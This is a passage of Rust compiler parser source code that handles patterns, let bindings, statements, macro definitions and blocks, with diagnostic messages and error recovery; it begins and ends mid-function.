let mut ddpos = None;
let mut prev_dd_sp = None;
let mut trailing_comma = false;
loop {
if self.eat(&token::DotDot) {
if ddpos.is_none() {
ddpos = Some(fields.len());
prev_dd_sp = Some(self.prev_span);
} else {
// Emit a friendly error, ignore `..` and continue parsing
let mut err = self.struct_span_err(
self.prev_span,
"`..` can only be used once per tuple or tuple struct pattern",
);
err.span_label(self.prev_span, "can only be used once per pattern");
if let Some(sp) = prev_dd_sp {
err.span_label(sp, "previously present here");
}
err.emit();
}
} else if !self.check(&token::CloseDelim(token::Paren)) {
fields.push(self.parse_pat(None)?);
} else {
break
}
trailing_comma = self.eat(&token::Comma);
if !trailing_comma {
break
}
}
if ddpos == Some(fields.len()) && trailing_comma {
// `..` must be followed by `)` or `, pat`; `..,)` is disallowed.
let msg = "trailing comma is not permitted after `..`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
Ok((fields, ddpos, trailing_comma))
}
fn parse_pat_vec_elements(
&mut self,
) -> PResult<'a, (Vec<P<Pat>>, Option<P<Pat>>, Vec<P<Pat>>)> {
let mut before = Vec::new();
let mut slice = None;
let mut after = Vec::new();
let mut first = true;
let mut before_slice = true;
while self.token != token::CloseDelim(token::Bracket) {
if first {
first = false;
} else {
self.expect(&token::Comma)?;
if self.token == token::CloseDelim(token::Bracket)
&& (before_slice || !after.is_empty()) {
break
}
}
if before_slice {
if self.eat(&token::DotDot) {
if self.check(&token::Comma) ||
self.check(&token::CloseDelim(token::Bracket)) {
slice = Some(P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Wild,
span: self.prev_span,
}));
before_slice = false;
}
continue
}
}
let subpat = self.parse_pat(None)?;
if before_slice && self.eat(&token::DotDot) {
slice = Some(subpat);
before_slice = false;
} else if before_slice {
before.push(subpat);
} else {
after.push(subpat);
}
}
Ok((before, slice, after))
}
fn parse_pat_field(
&mut self,
lo: Span,
attrs: Vec<Attribute>
) -> PResult<'a, source_map::Spanned<ast::FieldPat>> {
// Check if a colon exists one ahead. This means we're parsing a fieldname.
let hi;
let (subpat, fieldname, is_shorthand) = if self.look_ahead(1, |t| t == &token::Colon) {
// Parsing a pattern of the form "fieldname: pat"
let fieldname = self.parse_field_name()?;
self.bump();
let pat = self.parse_pat(None)?;
hi = pat.span;
(pat, fieldname, false)
} else {
// Parsing a pattern of the form "(box) (ref) (mut) fieldname"
let is_box = self.eat_keyword(kw::Box);
let boxed_span = self.span;
let is_ref = self.eat_keyword(kw::Ref);
let is_mut = self.eat_keyword(kw::Mut);
let fieldname = self.parse_ident()?;
hi = self.prev_span;
let bind_type = match (is_ref, is_mut) {
(true, true) => BindingMode::ByRef(Mutability::Mutable),
(true, false) => BindingMode::ByRef(Mutability::Immutable),
(false, true) => BindingMode::ByValue(Mutability::Mutable),
(false, false) => BindingMode::ByValue(Mutability::Immutable),
};
let fieldpat = P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Ident(bind_type, fieldname, None),
span: boxed_span.to(hi),
});
let subpat = if is_box {
P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Box(fieldpat),
span: lo.to(hi),
})
} else {
fieldpat
};
(subpat, fieldname, true)
};
Ok(source_map::Spanned {
span: lo.to(hi),
node: ast::FieldPat {
ident: fieldname,
pat: subpat,
is_shorthand,
attrs: attrs.into(),
}
})
}
/// Parses the fields of a struct-like pattern.
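///
/// E.g., for `{ x, y: pat, .. }` (the `{` has already been consumed by the
/// caller) this yields fields for `x` (shorthand) and `y`, with the returned
/// `bool` set because the `..` rest-marker is present.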
fn parse_pat_fields(&mut self) -> PResult<'a, (Vec<source_map::Spanned<ast::FieldPat>>, bool)> {
let mut fields = Vec::new();
let mut etc = false;
let mut ate_comma = true;
let mut delayed_err: Option<DiagnosticBuilder<'a>> = None;
let mut etc_span = None;
while self.token != token::CloseDelim(token::Brace) {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
// check that a comma comes after every field
if !ate_comma {
let err = self.struct_span_err(self.prev_span, "expected `,`");
if let Some(mut delayed) = delayed_err {
delayed.emit();
}
return Err(err);
}
ate_comma = false;
if self.check(&token::DotDot) || self.token == token::DotDotDot {
etc = true;
let mut etc_sp = self.span;
if self.token == token::DotDotDot { // Issue #46718
// Accept `...` as if it were `..` to avoid further errors
let mut err = self.struct_span_err(self.span,
"expected field pattern, found `...`");
err.span_suggestion(
self.span,
"to omit remaining fields, use one fewer `.`",
"..".to_owned(),
Applicability::MachineApplicable
);
err.emit();
}
self.bump(); // `..` || `...`
if self.token == token::CloseDelim(token::Brace) {
etc_span = Some(etc_sp);
break;
}
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!("expected `}}`, found {}", token_str));
err.span_label(self.span, "expected `}`");
let mut comma_sp = None;
if self.token == token::Comma { // Issue #49257
etc_sp = etc_sp.to(self.sess.source_map().span_until_non_whitespace(self.span));
err.span_label(etc_sp,
"`..` must be at the end and cannot have a trailing comma");
comma_sp = Some(self.span);
self.bump();
ate_comma = true;
}
etc_span = Some(etc_sp.until(self.span));
if self.token == token::CloseDelim(token::Brace) {
// If the struct looks otherwise well formed, recover and continue.
if let Some(sp) = comma_sp {
err.span_suggestion_short(
sp,
"remove this comma",
String::new(),
Applicability::MachineApplicable,
);
}
err.emit();
break;
} else if self.token.is_ident() && ate_comma {
// Accept fields coming after `..,`.
// This way we avoid "pattern missing fields" errors afterwards.
// We delay this error until the end in order to have a span for a
// suggested fix.
if let Some(mut delayed_err) = delayed_err {
delayed_err.emit();
return Err(err);
} else {
delayed_err = Some(err);
}
} else {
if let Some(mut err) = delayed_err {
err.emit();
}
return Err(err);
}
}
fields.push(match self.parse_pat_field(lo, attrs) {
Ok(field) => field,
Err(err) => {
if let Some(mut delayed_err) = delayed_err {
delayed_err.emit();
}
return Err(err);
}
});
ate_comma = self.eat(&token::Comma);
}
if let Some(mut err) = delayed_err {
if let Some(etc_span) = etc_span {
err.multipart_suggestion(
"move the `..` to the end of the field list",
vec![
(etc_span, String::new()),
(self.span, format!("{}.. }}", if ate_comma { "" } else { ", " })),
],
Applicability::MachineApplicable,
);
}
err.emit();
}
return Ok((fields, etc));
}
fn parse_pat_range_end(&mut self) -> PResult<'a, P<Expr>> {
if self.token.is_path_start() {
let lo = self.span;
let (qself, path) = if self.eat_lt() {
// Parse a qualified path
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
(Some(qself), path)
} else {
// Parse an unqualified path
(None, self.parse_path(PathStyle::Expr)?)
};
let hi = self.prev_span;
Ok(self.mk_expr(lo.to(hi), ExprKind::Path(qself, path), ThinVec::new()))
} else {
self.parse_literal_maybe_minus()
}
}
// Helper function to decide whether to parse as an ident binding or to try
// something more complex like range patterns.
fn parse_as_ident(&mut self) -> bool {
self.look_ahead(1, |t| match *t {
token::OpenDelim(token::Paren) | token::OpenDelim(token::Brace) |
token::DotDotDot | token::DotDotEq | token::ModSep | token::Not => Some(false),
// ensure slice patterns [a, b.., c] and [a, b, c..] don't go into the
// range pattern branch
token::DotDot => None,
_ => Some(true),
}).unwrap_or_else(|| self.look_ahead(2, |t| match *t {
token::Comma | token::CloseDelim(token::Bracket) => true,
_ => false,
}))
}
/// A wrapper around `parse_pat` with some special error handling for the
/// "top-level" patterns in a match arm, `for` loop, `let`, &c. (in contrast
/// to subpatterns within such).
fn parse_top_level_pat(&mut self) -> PResult<'a, P<Pat>> {
let pat = self.parse_pat(None)?;
if self.token == token::Comma {
// An unexpected comma after a top-level pattern is a clue that the
// user (perhaps more accustomed to some other language) forgot the
// parentheses in what should have been a tuple pattern; return a
// suggestion-enhanced error here rather than choking on the comma
// later.
let comma_span = self.span;
self.bump();
if let Err(mut err) = self.parse_pat_list() {
// We didn't expect this to work anyway; we just wanted
// to advance to the end of the comma-sequence so we know
// the span to suggest parenthesizing
err.cancel();
}
let seq_span = pat.span.to(self.prev_span);
let mut err = self.struct_span_err(comma_span,
"unexpected `,` in pattern");
if let Ok(seq_snippet) = self.sess.source_map().span_to_snippet(seq_span) {
err.span_suggestion(
seq_span,
"try adding parentheses to match on a tuple..",
format!("({})", seq_snippet),
Applicability::MachineApplicable
).span_suggestion(
seq_span,
"..or a vertical bar to match on multiple alternatives",
seq_snippet.replace(",", " |"),
Applicability::MachineApplicable
);
}
return Err(err);
}
Ok(pat)
}
/// Parses a pattern.
pub fn parse_pat(&mut self, expected: Option<&'static str>) -> PResult<'a, P<Pat>> {
self.parse_pat_with_range_pat(true, expected)
}
/// Parses a pattern, with a setting that controls whether modern range patterns
/// (e.g., `a..=b`, `a..b`) are allowed.
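///
/// Range patterns are rejected when `allow_range_pat == false`, i.e., in
/// subpattern position under `&`/`&mut` or `box`, where e.g. `&0..=5` reads
/// ambiguously; those get the "add parentheses" error below. `...` ranges
/// are exempted for backwards compatibility.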
fn parse_pat_with_range_pat(
&mut self,
allow_range_pat: bool,
expected: Option<&'static str>,
) -> PResult<'a, P<Pat>> {
maybe_recover_from_interpolated_ty_qpath!(self, true);
maybe_whole!(self, NtPat, |x| x);
let lo = self.span;
let pat;
match self.token {
token::BinOp(token::And) | token::AndAnd => {
// Parse &pat / &mut pat
self.expect_and()?;
let mutbl = self.parse_mutability();
if let token::Lifetime(ident) = self.token {
let mut err = self.fatal(&format!("unexpected lifetime `{}` in pattern",
ident));
err.span_label(self.span, "unexpected lifetime");
return Err(err);
}
let subpat = self.parse_pat_with_range_pat(false, expected)?;
pat = PatKind::Ref(subpat, mutbl);
}
token::OpenDelim(token::Paren) => {
// Parse (pat,pat,pat,...) as tuple pattern
let (fields, ddpos, trailing_comma) = self.parse_parenthesized_pat_list()?;
pat = if fields.len() == 1 && ddpos.is_none() && !trailing_comma {
PatKind::Paren(fields.into_iter().nth(0).unwrap())
} else {
PatKind::Tuple(fields, ddpos)
};
}
token::OpenDelim(token::Bracket) => {
// Parse [pat,pat,...] as slice pattern
self.bump();
let (before, slice, after) = self.parse_pat_vec_elements()?;
self.expect(&token::CloseDelim(token::Bracket))?;
pat = PatKind::Slice(before, slice, after);
}
// At this point, token != &, &&, (, [
_ => if self.eat_keyword(kw::Underscore) {
// Parse _
pat = PatKind::Wild;
} else if self.eat_keyword(kw::Mut) {
// Parse mut ident @ pat / mut ref ident @ pat
let mutref_span = self.prev_span.to(self.span);
let binding_mode = if self.eat_keyword(kw::Ref) {
self.diagnostic()
.struct_span_err(mutref_span, "the order of `mut` and `ref` is incorrect")
.span_suggestion(
mutref_span,
"try switching the order",
"ref mut".into(),
Applicability::MachineApplicable
).emit();
BindingMode::ByRef(Mutability::Mutable)
} else {
BindingMode::ByValue(Mutability::Mutable)
};
pat = self.parse_pat_ident(binding_mode)?;
} else if self.eat_keyword(kw::Ref) {
// Parse ref ident @ pat / ref mut ident @ pat
let mutbl = self.parse_mutability();
pat = self.parse_pat_ident(BindingMode::ByRef(mutbl))?;
} else if self.eat_keyword(kw::Box) {
// Parse box pat
let subpat = self.parse_pat_with_range_pat(false, None)?;
pat = PatKind::Box(subpat);
} else if self.token.is_ident() && !self.token.is_reserved_ident() &&
self.parse_as_ident() {
// Parse ident @ pat
// This can give false positives and parse nullary enums,
// they are dealt with later in resolve
let binding_mode = BindingMode::ByValue(Mutability::Immutable);
pat = self.parse_pat_ident(binding_mode)?;
} else if self.token.is_path_start() {
// Parse pattern starting with a path
let (qself, path) = if self.eat_lt() {
// Parse a qualified path
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
(Some(qself), path)
} else {
// Parse an unqualified path
(None, self.parse_path(PathStyle::Expr)?)
};
match self.token {
token::Not if qself.is_none() => {
// Parse macro invocation
self.bump();
let (delim, tts) = self.expect_delimited_token_tree()?;
let mac = respan(lo.to(self.prev_span), Mac_ { path, tts, delim });
pat = PatKind::Mac(mac);
}
token::DotDotDot | token::DotDotEq | token::DotDot => {
let end_kind = match self.token {
token::DotDot => RangeEnd::Excluded,
token::DotDotDot => RangeEnd::Included(RangeSyntax::DotDotDot),
token::DotDotEq => RangeEnd::Included(RangeSyntax::DotDotEq),
_ => panic!("can only parse `..`/`...`/`..=` for ranges \
(checked above)"),
};
let op_span = self.span;
// Parse range
let span = lo.to(self.prev_span);
let begin = self.mk_expr(span, ExprKind::Path(qself, path), ThinVec::new());
self.bump();
let end = self.parse_pat_range_end()?;
let op = Spanned { span: op_span, node: end_kind };
pat = PatKind::Range(begin, end, op);
}
token::OpenDelim(token::Brace) => {
if qself.is_some() {
let msg = "unexpected `{` after qualified path";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
// Parse struct pattern
self.bump();
let (fields, etc) = self.parse_pat_fields().unwrap_or_else(|mut e| {
e.emit();
self.recover_stmt();
(vec![], true)
});
self.bump();
pat = PatKind::Struct(path, fields, etc);
}
token::OpenDelim(token::Paren) => {
if qself.is_some() {
let msg = "unexpected `(` after qualified path";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
// Parse tuple struct or enum pattern
let (fields, ddpos, _) = self.parse_parenthesized_pat_list()?;
pat = PatKind::TupleStruct(path, fields, ddpos)
}
_ => pat = PatKind::Path(qself, path),
}
} else {
// Try to parse everything else as literal with optional minus
match self.parse_literal_maybe_minus() {
Ok(begin) => {
let op_span = self.span;
if self.check(&token::DotDot) || self.check(&token::DotDotEq) ||
self.check(&token::DotDotDot) {
let end_kind = if self.eat(&token::DotDotDot) {
RangeEnd::Included(RangeSyntax::DotDotDot)
} else if self.eat(&token::DotDotEq) {
RangeEnd::Included(RangeSyntax::DotDotEq)
} else if self.eat(&token::DotDot) {
RangeEnd::Excluded
} else {
panic!("impossible case: we already matched \
on a range-operator token")
};
let end = self.parse_pat_range_end()?;
let op = Spanned { span: op_span, node: end_kind };
pat = PatKind::Range(begin, end, op);
} else {
pat = PatKind::Lit(begin);
}
}
Err(mut err) => {
self.cancel(&mut err);
let expected = expected.unwrap_or("pattern");
let msg = format!(
"expected {}, found {}",
expected,
self.this_token_descr(),
);
let mut err = self.fatal(&msg);
err.span_label(self.span, format!("expected {}", expected));
let sp = self.sess.source_map().start_point(self.span);
if let Some(sp) = self.sess.ambiguous_block_expr_parse.borrow().get(&sp) {
self.sess.expr_parentheses_needed(&mut err, *sp, None);
}
return Err(err);
}
}
}
}
let pat = P(Pat { node: pat, span: lo.to(self.prev_span), id: ast::DUMMY_NODE_ID });
let pat = self.maybe_recover_from_bad_qpath(pat, true)?;
if !allow_range_pat {
match pat.node {
PatKind::Range(
_, _, Spanned { node: RangeEnd::Included(RangeSyntax::DotDotDot), .. }
) => {},
PatKind::Range(..) => {
let mut err = self.struct_span_err(
pat.span,
"the range pattern here has ambiguous interpretation",
);
err.span_suggestion(
pat.span,
"add parentheses to clarify the precedence",
format!("({})", pprust::pat_to_string(&pat)),
// "ambiguous interpretation" implies that we have to be guessing
Applicability::MaybeIncorrect
);
return Err(err);
}
_ => {}
}
}
Ok(pat)
}
/// Parses `ident` or `ident @ pat`.
/// Used by the `copy foo` and `ref foo` patterns to give a good
/// error message when parsing mistakes like `ref foo(a, b)`.
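///
/// For example (illustrative input), given the source `ref mut x @ Some(_)`,
/// the caller consumes `ref mut` and this parses the remaining `x @ Some(_)`.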
fn parse_pat_ident(&mut self,
binding_mode: ast::BindingMode)
-> PResult<'a, PatKind> {
let ident = self.parse_ident()?;
let sub = if self.eat(&token::At) {
Some(self.parse_pat(Some("binding pattern"))?)
} else {
None
};
// just to be friendly, if they write something like
// ref Some(i)
// we end up here with ( as the current token. This shortly
// leads to a parse error. Note that if there is no explicit
// binding mode then we do not end up here, because the lookahead
// will direct us over to parse_enum_variant()
if self.token == token::OpenDelim(token::Paren) {
return Err(self.span_fatal(
self.prev_span,
"expected identifier, found enum pattern"))
}
Ok(PatKind::Ident(binding_mode, ident, sub))
}
/// Parses a local variable declaration.
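///
/// The `let` keyword has already been eaten by the caller, so for a statement
/// like `let x: u32 = 1;` (illustrative) this parses the `x: u32 = 1` part;
/// the trailing `;` is handled by the statement parser.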
fn parse_local(&mut self, attrs: ThinVec<Attribute>) -> PResult<'a, P<Local>> {
let lo = self.prev_span;
let pat = self.parse_top_level_pat()?;
let (err, ty) = if self.eat(&token::Colon) {
// Save the state of the parser before parsing type normally, in case there is a `:`
// instead of an `=` typo.
let parser_snapshot_before_type = self.clone();
let colon_sp = self.prev_span;
match self.parse_ty() {
Ok(ty) => (None, Some(ty)),
Err(mut err) => {
// Rewind to before attempting to parse the type and continue parsing
let parser_snapshot_after_type = self.clone();
mem::replace(self, parser_snapshot_before_type);
let snippet = self.sess.source_map().span_to_snippet(pat.span).unwrap();
err.span_label(pat.span, format!("while parsing the type for `{}`", snippet));
(Some((parser_snapshot_after_type, colon_sp, err)), None)
}
}
} else {
(None, None)
};
let init = match (self.parse_initializer(err.is_some()), err) {
(Ok(init), None) => { // init parsed, ty parsed
init
}
(Ok(init), Some((_, colon_sp, mut err))) => { // init parsed, ty error
// Could parse the type as if it were the initializer, it is likely there was a
// typo in the code: `:` instead of `=`. Add suggestion and emit the error.
err.span_suggestion_short(
colon_sp,
"use `=` if you meant to assign",
"=".to_string(),
Applicability::MachineApplicable
);
err.emit();
// As this was parsed successfully, continue as if the code has been fixed for the
// rest of the file. It will still fail due to the emitted error, but we avoid
// extra noise.
init
}
(Err(mut init_err), Some((snapshot, _, ty_err))) => { // init error, ty error
init_err.cancel();
// Couldn't parse the type nor the initializer, only raise the type error and
// return to the parser state before parsing the type as the initializer.
// let x: <parse_error>;
mem::replace(self, snapshot);
return Err(ty_err);
}
(Err(err), None) => { // init error, ty parsed
// Couldn't parse the initializer and we're not attempting to recover a failed
// parse of the type, return the error.
return Err(err);
}
};
let hi = if self.token == token::Semi {
self.span
} else {
self.prev_span
};
Ok(P(ast::Local {
ty,
pat,
init,
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
attrs,
}))
}
/// Parses a structure field.
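///
/// Visibility and attributes are supplied by the caller; this parses just the
/// `name: Ty` part, e.g. the `len: usize` in `pub len: usize` (illustrative).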
fn parse_name_and_ty(&mut self,
lo: Span,
vis: Visibility,
attrs: Vec<Attribute>)
-> PResult<'a, StructField> {
let name = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
Ok(StructField {
span: lo.to(self.prev_span),
ident: Some(name),
vis,
id: ast::DUMMY_NODE_ID,
ty,
attrs,
})
}
/// Emits an expected-item-after-attributes error.
fn expected_item_err(&mut self, attrs: &[Attribute]) -> PResult<'a, ()> {
let message = match attrs.last() {
Some(&Attribute { is_sugared_doc: true, .. }) => "expected item after doc comment",
_ => "expected item after attributes",
};
let mut err = self.diagnostic().struct_span_err(self.prev_span, message);
if attrs.last().unwrap().is_sugared_doc {
err.span_label(self.prev_span, "this doc comment doesn't document anything");
}
Err(err)
}
/// Parses a statement. This stops just before trailing semicolons on everything but items.
/// e.g., a `StmtKind::Semi` parses to a `StmtKind::Expr`, leaving the trailing `;` unconsumed.
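/// For instance, given the input `foo();` (illustrative), the returned
/// statement covers `foo()` and the `;` is left in the token stream.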
pub fn parse_stmt(&mut self) -> PResult<'a, Option<Stmt>> {
Ok(self.parse_stmt_(true))
}
fn parse_stmt_(&mut self, macro_legacy_warnings: bool) -> Option<Stmt> {
self.parse_stmt_without_recovery(macro_legacy_warnings).unwrap_or_else(|mut e| {
e.emit();
self.recover_stmt_(SemiColonMode::Break, BlockMode::Ignore);
None
})
}
fn is_async_block(&self) -> bool {
self.token.is_keyword(kw::Async) &&
(
( // `async move {`
self.is_keyword_ahead(1, &[kw::Move]) &&
self.look_ahead(2, |t| *t == token::OpenDelim(token::Brace))
) || ( // `async {`
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace))
)
)
}
fn is_async_fn(&self) -> bool {
self.token.is_keyword(kw::Async) &&
self.is_keyword_ahead(1, &[kw::Fn])
}
fn is_do_catch_block(&self) -> bool {
self.token.is_keyword(kw::Do) &&
self.is_keyword_ahead(1, &[kw::Catch]) &&
self.look_ahead(2, |t| *t == token::OpenDelim(token::Brace)) &&
!self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL)
}
fn is_try_block(&self) -> bool {
self.token.is_keyword(kw::Try) &&
self.look_ahead(1, |t| *t == token::OpenDelim(token::Brace)) &&
self.span.rust_2018() &&
// prevent `while try {} {}`, `if try {} {} else {}`, etc.
!self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL)
}
fn is_union_item(&self) -> bool {
self.token.is_keyword(kw::Union) &&
self.look_ahead(1, |t| t.is_ident() && !t.is_reserved_ident())
}
fn is_crate_vis(&self) -> bool {
self.token.is_keyword(kw::Crate) && self.look_ahead(1, |t| t != &token::ModSep)
}
fn is_existential_type_decl(&self) -> bool {
self.token.is_keyword(kw::Existential) &&
self.is_keyword_ahead(1, &[kw::Type])
}
fn is_auto_trait_item(&self) -> bool {
// auto trait
(self.token.is_keyword(kw::Auto) &&
self.is_keyword_ahead(1, &[kw::Trait]))
|| // unsafe auto trait
(self.token.is_keyword(kw::Unsafe) &&
self.is_keyword_ahead(1, &[kw::Auto]) &&
self.is_keyword_ahead(2, &[kw::Trait]))
}
fn eat_macro_def(&mut self, attrs: &[Attribute], vis: &Visibility, lo: Span)
-> PResult<'a, Option<P<Item>>> {
let token_lo = self.span;
let (ident, def) = match self.token {
token::Ident(ident, false) if ident.name == kw::Macro => {
self.bump();
let ident = self.parse_ident()?;
let tokens = if self.check(&token::OpenDelim(token::Brace)) {
match self.parse_token_tree() {
TokenTree::Delimited(_, _, tts) => tts,
_ => unreachable!(),
}
} else if self.check(&token::OpenDelim(token::Paren)) {
let args = self.parse_token_tree();
let body = if self.check(&token::OpenDelim(token::Brace)) {
self.parse_token_tree()
} else {
self.unexpected()?;
unreachable!()
};
TokenStream::new(vec![
args.into(),
TokenTree::Token(token_lo.to(self.prev_span), token::FatArrow).into(),
body.into(),
])
} else {
self.unexpected()?;
unreachable!()
};
(ident, ast::MacroDef { tokens: tokens.into(), legacy: false })
}
token::Ident(ident, _) if ident.name == sym::macro_rules &&
self.look_ahead(1, |t| *t == token::Not) => {
let prev_span = self.prev_span;
self.complain_if_pub_macro(&vis.node, prev_span);
self.bump();
self.bump();
let ident = self.parse_ident()?;
let (delim, tokens) = self.expect_delimited_token_tree()?;
if delim != MacDelimiter::Brace && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
(ident, ast::MacroDef { tokens, legacy: true })
}
_ => return Ok(None),
};
let span = lo.to(self.prev_span);
Ok(Some(self.mk_item(span, ident, ItemKind::MacroDef(def), vis.clone(), attrs.to_vec())))
}
fn parse_stmt_without_recovery(&mut self,
macro_legacy_warnings: bool)
-> PResult<'a, Option<Stmt>> {
maybe_whole!(self, NtStmt, |x| Some(x));
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
Ok(Some(if self.eat_keyword(kw::Let) {
Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Local(self.parse_local(attrs.into())?),
span: lo.to(self.prev_span),
}
} else if let Some(macro_def) = self.eat_macro_def(
&attrs,
&source_map::respan(lo, VisibilityKind::Inherited),
lo,
)? {
Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Item(macro_def),
span: lo.to(self.prev_span),
}
// Starts like a simple path, being careful to avoid contextual keywords
// such as union items, items with `crate` visibility, or auto trait items.
// Our goal here is to parse an arbitrary path `a::b::c`, but not something
// that starts like a path (1 token) yet is in fact not a path.
// `union::b::c` - path, `union U { ... }` - not a path.
// `crate::b::c` - path, `crate struct S;` - not a path.
} else if self.token.is_path_start() &&
!self.token.is_qpath_start() &&
!self.is_union_item() &&
!self.is_crate_vis() &&
!self.is_existential_type_decl() &&
!self.is_auto_trait_item() &&
!self.is_async_fn() {
let pth = self.parse_path(PathStyle::Expr)?;
if !self.eat(&token::Not) {
let expr = if self.check(&token::OpenDelim(token::Brace)) {
self.parse_struct_expr(lo, pth, ThinVec::new())?
} else {
let hi = self.prev_span;
self.mk_expr(lo.to(hi), ExprKind::Path(None, pth), ThinVec::new())
};
let expr = self.with_res(Restrictions::STMT_EXPR, |this| {
let expr = this.parse_dot_or_call_expr_with(expr, lo, attrs.into())?;
this.parse_assoc_expr_with(0, LhsExpr::AlreadyParsed(expr))
})?;
return Ok(Some(Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Expr(expr),
span: lo.to(self.prev_span),
}));
}
// it's a macro invocation
let id = match self.token {
token::OpenDelim(_) => Ident::invalid(), // no special identifier
_ => self.parse_ident()?,
};
// check that we're pointing at delimiters (need to check
// again after the `if`, because of `parse_ident`
// consuming more tokens).
match self.token {
token::OpenDelim(_) => {}
_ => {
// we only expect an ident if we didn't parse one
// above.
let ident_str = if id.name == kw::Invalid {
"identifier, "
} else {
""
};
let tok_str = self.this_token_descr();
let mut err = self.fatal(&format!("expected {}`(` or `{{`, found {}",
ident_str,
tok_str));
err.span_label(self.span, format!("expected {}`(` or `{{`", ident_str));
return Err(err)
},
}
let (delim, tts) = self.expect_delimited_token_tree()?;
let hi = self.prev_span;
let style = if delim == MacDelimiter::Brace {
MacStmtStyle::Braces
} else {
MacStmtStyle::NoBraces
};
if id.name == kw::Invalid {
let mac = respan(lo.to(hi), Mac_ { path: pth, tts, delim });
let node = if delim == MacDelimiter::Brace ||
self.token == token::Semi || self.token == token::Eof {
StmtKind::Mac(P((mac, style, attrs.into())))
}
// We used to incorrectly stop parsing macro-expanded statements here.
// If the next token will be an error anyway but could have parsed with the
// earlier behavior, stop parsing here and emit a warning to avoid breakage.
else if macro_legacy_warnings && self.token.can_begin_expr() && match self.token {
// These can continue an expression, so we can't stop parsing and warn.
token::OpenDelim(token::Paren) | token::OpenDelim(token::Bracket) |
token::BinOp(token::Minus) | token::BinOp(token::Star) |
token::BinOp(token::And) | token::BinOp(token::Or) |
token::AndAnd | token::OrOr |
token::DotDot | token::DotDotDot | token::DotDotEq => false,
_ => true,
} {
self.warn_missing_semicolon();
StmtKind::Mac(P((mac, style, attrs.into())))
} else {
let e = self.mk_expr(mac.span, ExprKind::Mac(mac), ThinVec::new());
let e = self.maybe_recover_from_bad_qpath(e, true)?;
let e = self.parse_dot_or_call_expr_with(e, lo, attrs.into())?;
let e = self.parse_assoc_expr_with(0, LhsExpr::AlreadyParsed(e))?;
StmtKind::Expr(e)
};
Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(hi),
node,
}
} else {
// if it has a special ident, it's definitely an item
//
// Require a semicolon or braces.
if style != MacStmtStyle::Braces && !self.eat(&token::Semi) {
self.report_invalid_macro_expansion_item();
}
let span = lo.to(hi);
Stmt {
id: ast::DUMMY_NODE_ID,
span,
node: StmtKind::Item({
self.mk_item(
span, id /*id is good here*/,
ItemKind::Mac(respan(span, Mac_ { path: pth, tts, delim })),
respan(lo, VisibilityKind::Inherited),
attrs)
}),
}
}
} else {
// FIXME: Bad copy of attrs
let old_directory_ownership =
mem::replace(&mut self.directory.ownership, DirectoryOwnership::UnownedViaBlock);
let item = self.parse_item_(attrs.clone(), false, true)?;
self.directory.ownership = old_directory_ownership;
match item {
Some(i) => Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(i.span),
node: StmtKind::Item(i),
},
None => {
let unused_attrs = |attrs: &[Attribute], s: &mut Self| {
if !attrs.is_empty() {
if s.prev_token_kind == PrevTokenKind::DocComment {
s.span_fatal_err(s.prev_span, Error::UselessDocComment).emit();
} else if attrs.iter().any(|a| a.style == AttrStyle::Outer) {
s.span_err(s.span, "expected statement after outer attribute");
}
}
};
// Do not attempt to parse an expression if we're done here.
if self.token == token::Semi {
unused_attrs(&attrs, self);
self.bump();
return Ok(None);
}
if self.token == token::CloseDelim(token::Brace) {
unused_attrs(&attrs, self);
return Ok(None);
}
// Remainder are line-expr stmts.
let e = self.parse_expr_res(
Restrictions::STMT_EXPR, Some(attrs.into()))?;
Stmt {
id: ast::DUMMY_NODE_ID,
span: lo.to(e.span),
node: StmtKind::Expr(e),
}
}
}
}))
}
/// Checks if this expression is a successfully parsed statement.
fn expr_is_complete(&self, e: &Expr) -> bool {
self.restrictions.contains(Restrictions::STMT_EXPR) &&
!classify::expr_requires_semi_to_be_stmt(e)
}
/// Parses a block. No inner attributes are allowed.
pub fn parse_block(&mut self) -> PResult<'a, P<Block>> {
maybe_whole!(self, NtBlock, |x| x);
let lo = self.span;
if !self.eat(&token::OpenDelim(token::Brace)) {
let sp = self.span;
let tok = self.this_token_descr();
let mut e = self.span_fatal(sp, &format!("expected `{{`, found {}", tok));
let do_not_suggest_help =
self.token.is_keyword(kw::In) || self.token == token::Colon;
if self.token.is_ident_named(sym::and) {
e.span_suggestion_short(
self.span,
"use `&&` instead of `and` for the boolean operator",
"&&".to_string(),
Applicability::MaybeIncorrect,
);
}
if self.token.is_ident_named(sym::or) {
e.span_suggestion_short(
self.span,
"use `||` instead of `or` for the boolean operator",
"||".to_string(),
Applicability::MaybeIncorrect,
);
}
// Check to see if the user has written something like
//
// if (cond)
// bar;
//
// Which is valid in other languages, but not Rust.
match self.parse_stmt_without_recovery(false) {
Ok(Some(stmt)) => {
if self.look_ahead(1, |t| t == &token::OpenDelim(token::Brace))
|| do_not_suggest_help {
// if the next token is an open brace (e.g., `if a b {`), the place-
// inside-a-block suggestion would be more likely wrong than right
e.span_label(sp, "expected `{`");
return Err(e);
}
let mut stmt_span = stmt.span;
// expand the span to include the semicolon, if it exists
if self.eat(&token::Semi) {
stmt_span = stmt_span.with_hi(self.prev_span.hi());
}
let sugg = pprust::to_string(|s| {
use crate::print::pprust::{PrintState, INDENT_UNIT};
s.ibox(INDENT_UNIT)?;
s.bopen()?;
s.print_stmt(&stmt)?;
s.bclose_maybe_open(stmt.span, INDENT_UNIT, false)
});
e.span_suggestion(
stmt_span,
"try placing this code inside a block",
sugg,
